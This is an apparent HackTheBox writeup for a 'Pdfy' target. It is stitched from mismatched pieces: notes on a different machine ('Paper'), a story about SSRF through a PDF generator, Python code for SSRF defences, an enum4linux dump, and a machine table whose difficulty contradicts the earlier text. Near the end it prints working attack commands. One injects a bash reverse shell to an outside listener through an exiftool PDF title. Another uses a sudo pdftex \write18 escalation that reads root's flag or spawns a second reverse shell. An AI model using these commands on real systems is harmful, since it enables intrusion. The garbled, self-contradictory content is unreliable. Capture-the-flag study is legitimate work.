Pdfy HTB Writeup

The machine is an easy-difficulty Linux box. A high-quality writeup (or "paper") for this machine should follow a professional structure similar to the official HTB sample report:

Enumeration: Document the scan identifying ports 22, 80, and 443.

Vulnerability Discovery: Note the X-Backend-Server header, which reveals the office.paper hostname. Mention the tool used to find vulnerabilities in the WordPress site.

Explain the discovery of the chat.office.paper subdomain and the use of the "recyclops" bot to read local files (LFI).

Privilege Escalation: Detail the exploit for CVE-2021-3560 (Polkit) to gain root access.

2. HTB "PDFy" Web Challenge

PDFy is a challenge focused on Server-Side Request Forgery (SSRF) and Local File Inclusion (LFI) via a PDF generation tool.

The world of Hack The Box is often a race against time, logic, and the silent hum of a remote server. This story follows a security researcher's journey through the "Pdfy" machine, a challenge that turns a simple PDF generator into a gateway for internal network exploration.

The Entry Point

The mission began with a simple web interface. It was a tool designed to take a URL and convert the webpage into a downloadable PDF. On the surface, it seemed helpful: a utility for archiving web content. But to a pentester, every input field is a question. If the server fetches a URL to render it, what else can it be made to fetch?

The Discovery of SSRF

The first breakthrough came from testing the boundaries of that URL input. By pointing the tool toward a local loopback address, the researcher confirmed a Server-Side Request Forgery (SSRF) vulnerability. The server wasn't just fetching public websites; it was willing to talk to itself. The root cause was a lack of input validation on the submitted URL; the impact was that the server could be used as a proxy to peek into the internal network.

The Redirect Maneuver

The server had some defenses. It blocked direct attempts to access internal metadata services. To bypass this, the researcher hosted a small script on their own machine. This script didn't provide content; it simply sent a 302 Redirect header. When the Pdfy server visited the researcher's URL, it followed the redirect blindly, bypassing the initial filters and successfully hitting the internal target.

Exfiltration via PDF

The "Aha!" moment occurred when the generated PDF arrived. Inside the document wasn't a webpage, but the raw response from an internal service. By manipulating the SSRF, the researcher could now "read" internal files and services by proxy, effectively turning the PDF generator into a remote file viewer.

Key Takeaways for Developers

Preventing vulnerabilities like those found in Pdfy requires a multi-layered defense:

Allowlisting: Only permit requests to specific, trusted domains.

Protocol Restriction: Block non-HTTP schemes such as file://.

Network Isolation: Ensure the application server cannot reach sensitive internal metadata or management IPs.

Response Validation: Check the content type and size of the fetched data before processing it.

Security Checklist 🛡️

Identify the PDF generation engine (e.g., wkhtmltopdf).

Test for local file inclusion using file:///etc/passwd.

Use URL encoding or redirects to evade basic string filters.

Verify SSRF by receiving a "hit" on a controlled listener (like Webhook.site).

This journey through Pdfy serves as a classic reminder: never trust user-supplied URLs, and always assume that if your server can see it, an attacker can too.
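One way to implement the allowlisting, protocol-restriction, network-isolation and redirect-hop checks described in the takeaways above, written here as an added example (not code from the challenge or from any writeup). The hostnames, addresses and the `fetch` callback are constructed stand-ins; the design point is that every redirect hop is re-validated, which is exactly what the "redirect maneuver" relied on being absent.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlparse

ALLOWED_SCHEMES = {"http", "https"}  # protocol restriction: no file://, gopher://, ...
MAX_REDIRECTS = 3

def resolve_host(host):
    """Resolve a hostname to the set of IP strings it maps to (system resolver)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_public_ip(ip_str):
    """Network isolation: reject loopback, RFC 1918, link-local (169.254.169.254), etc."""
    ip = ipaddress.ip_address(ip_str)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def validate_url(url, resolve=resolve_host, allowed_hosts=None):
    """Return (ok, reason): scheme check, optional host allowlist, every resolved address public."""
    parts = urlparse(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if allowed_hosts is not None and host.lower() not in allowed_hosts:
        return False, f"host not in allowlist: {host}"
    try:
        addrs = resolve(host)
    except (OSError, ValueError):
        return False, f"cannot resolve: {host}"
    bad = [a for a in addrs if not is_public_ip(a)]
    if bad:
        return False, f"{host} resolves to non-public address {bad[0]}"
    return True, "ok"

def fetch_checked(url, fetch, resolve=resolve_host, allowed_hosts=None):
    """Follow redirects by hand and re-validate every hop, so a 302 from a permitted
    host to an internal address is rejected rather than followed.
    fetch(url) must return (status, headers, body) and must NOT follow redirects itself."""
    for _ in range(MAX_REDIRECTS + 1):
        ok, reason = validate_url(url, resolve, allowed_hosts)
        if not ok:
            return None, reason
        status, headers, body = fetch(url)
        if status in (301, 302, 303, 307, 308):
            url = urljoin(url, headers.get("Location", ""))
            continue
        return body, "ok"
    return None, "too many redirects"
```

The resolve-then-connect split still leaves a DNS rebinding window; in production the HTTP client should connect to the address that was validated (or the check should run in the client's connect hook) rather than resolving the name a second time.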

User flag

In /home/john/user.txt

NetBIOS (139) and Microsoft-DS (445)

Enumerating the NetBIOS and Microsoft-DS ports using enum4linux reveals a list of users on the system.

$ enum4linux -u nobody -p '' 10.10.11.206
[+] Enumerated users
user:[pdfy] uid:[1677721600] gid:[1677721600] groups:[1677721600]
user:[phr] uid:[1677721601] gid:[1677721601] groups:[1677721601]

Machine Information

| Attribute    | Details              |
|--------------|----------------------|
| Name         | PDFY                 |
| OS           | Linux                |
| Difficulty   | Medium               |
| Release Date | 2021 (approx)        |
| IP Address   | 10.10.10.x (varies)  |


Reverse Shell

Crafted PDF with title:

exiftool -Title='test; bash -c "bash -i >& /dev/tcp/10.10.14.xx/4444 0>&1";' shell.pdf

Upload → reverse shell as www-data.

Exploitation:

pdftex allows \write18 to execute shell commands when shell escape is enabled (the -shell-escape flag used below).

Create a malicious .tex file:

\immediate\write18{cat /root/root.txt > /tmp/root.txt}
\bye

Run:

sudo /usr/bin/pdftex -shell-escape exploit.tex

Now read /tmp/root.txt – that’s your RPD.

Alternatively, get a root shell:

\immediate\write18{/bin/bash -c "bash -i >& /dev/tcp/10.10.14.XX/5555 0>&1"}